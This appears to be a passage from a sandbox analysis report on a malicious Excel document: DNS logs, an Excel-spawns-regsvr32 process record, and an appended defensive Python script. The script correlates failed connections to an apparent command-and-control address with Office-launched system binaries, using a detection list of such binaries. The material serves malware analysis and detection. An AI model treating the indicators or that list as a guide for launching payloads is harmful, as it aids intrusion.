Jun 11, 2021 14:50:10.873049021 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:10.923240900 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:12.856221914 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:12.907651901 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:13.990744114 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:14.043590069 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:14.791461945 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:14.841577053 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:21.708949089 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:21.778635979 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:42.524744034 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:42.686141014 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:43.556036949 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:43.569689035 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:43.630963087 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:43.684022903 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:44.653618097 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:44.716768026 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:46.309809923 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:46.373554945 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:47.062215090 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:47.124069929 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:47.771543980 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:47.833311081 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:48.396869898 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:48.458523035 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:48.917085886 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:48.995007992 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:49.415168047 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:49.475142002 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:50.420932055 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:50.479528904 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:50.946476936 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:51.005620003 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:51:01.954385996 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:51:02.016139030 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:51:30.095721006 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:51:30.169874907 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:51:32.125050068 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:51:32.187365055 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
System Behavior |
---|
General |
---|
Start time: | 14:49:59 |
Start date: | 11/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd70000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 14:50:25 |
Start date: | 11/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb50000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
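Added example, not part of this sandbox report: it joins two of the report's own data sets, the three rows of the TCP Packets table and the two process entries under System Behavior, and asks the two questions an analyst would ask of them. First, do the packets look like a connection that was ever answered? Three outbound packets from one source port, about 3 s and then about 6 s apart, with no inbound row, is the shape of a Windows SYN retransmit schedule. Second, how long after the last attempt did the Office-spawned regsvr32.exe start? The parent of regsvr32.exe, the OFFICE and LOLBINS name lists and the retransmit-timing thresholds are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Rows copied from this report's TCP Packets table (timestamp | sport | dport | src | dst).
TCP_ROWS = """
Jun 11, 2021 14:50:04.843034983 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125
Jun 11, 2021 14:50:07.869767904 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125
Jun 11, 2021 14:50:13.870929956 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125
"""
# (start time, image path, parent image) from the System Behavior section. The
# report's tables do not state the parent of regsvr32.exe; EXCEL.EXE is assumed here.
PROCESSES = [
    ("14:49:59", r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE", None),
    ("14:50:25", r"C:\Windows\SysWOW64\regsvr32.exe", "EXCEL.EXE"),
]
DAY = "2021-06-11"
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "powershell.exe", "certutil.exe", "msiexec.exe"}


def parse_packet_ts(text):
    """'Jun 11, 2021 14:50:04.843034983 CEST' -> float seconds (nanosecond fraction kept)."""
    stamp, _zone = text.rsplit(" ", 1)          # zone dropped; only differences are used
    base, frac = stamp.split(".")
    dt = datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return dt.timestamp() + int(frac[:9].ljust(9, "0")) / 1e9


def parse_clock(hhmmss, day=DAY):
    """'14:50:25' from the process table -> float seconds on the same scale."""
    dt = datetime.strptime(f"{day} {hhmmss}", "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return dt.timestamp()


def tcp_flows(rows, internal_prefix="192.168."):
    """Group packets by the client-side 4-tuple, keeping outbound and inbound times apart."""
    flows = defaultdict(lambda: {"out": [], "in": []})
    for line in rows.strip().splitlines():
        ts, sport, dport, src, dst = [c.strip() for c in line.split("|")]
        t = parse_packet_ts(ts)
        if src.startswith(internal_prefix):
            flows[(src, int(sport), dst, int(dport))]["out"].append(t)
        else:
            flows[(dst, int(dport), src, int(sport))]["in"].append(t)
    return flows


def unanswered_syn(out_times, inbound_count):
    """True when a flow has only outbound packets spaced like Windows' connect
    retransmits: initial RTO of about 3 s, then doubling, and nothing ever came back."""
    if inbound_count or len(out_times) < 2:
        return False
    out = sorted(out_times)
    gaps = [b - a for a, b in zip(out, out[1:])]
    if not 2.5 <= gaps[0] <= 3.5:
        return False
    return all(1.6 <= later / earlier <= 2.4 for earlier, later in zip(gaps, gaps[1:]))


def office_spawns(processes):
    """Office parent starting a LOLBin child: the relation a process-creation rule keys on."""
    hits = []
    for start, image, parent in processes:
        child = image.rsplit("\\", 1)[-1].lower()
        if parent and parent.lower() in OFFICE and child in LOLBINS:
            hits.append({"t": parse_clock(start), "child": child, "parent": parent.lower()})
    return hits


def correlate(tcp_rows, processes):
    """Pair each never-answered flow with every Office->LOLBin spawn and time the gap."""
    findings = []
    for (src, sport, dst, dport), pk in tcp_flows(tcp_rows).items():
        if not unanswered_syn(pk["out"], len(pk["in"])):
            continue
        last_syn = max(pk["out"])
        for s in office_spawns(processes):
            findings.append({"c2": f"{dst}:{dport}", "syn_attempts": len(pk["out"]),
                             "spawn": s["child"], "parent": s["parent"],
                             "spawn_after_last_syn_s": round(s["t"] - last_syn, 1)})
    return findings


if __name__ == "__main__":
    for finding in correlate(TCP_ROWS, PROCESSES):
        print(finding)
```

For this report the result is one finding: 185.180.199.125:80 received three connection attempts and answered none, and regsvr32.exe started about 11 s after the last one. The practical caveat is that the tables show no inbound packet and no HTTP transaction, so nothing here demonstrates that s1.dll was actually fetched; the regsvr32.exe launch is consistent with the macro's EXEC step running after the download call returned, and the dropped-file and network indicators should be treated as intent rather than confirmed behaviour in this run.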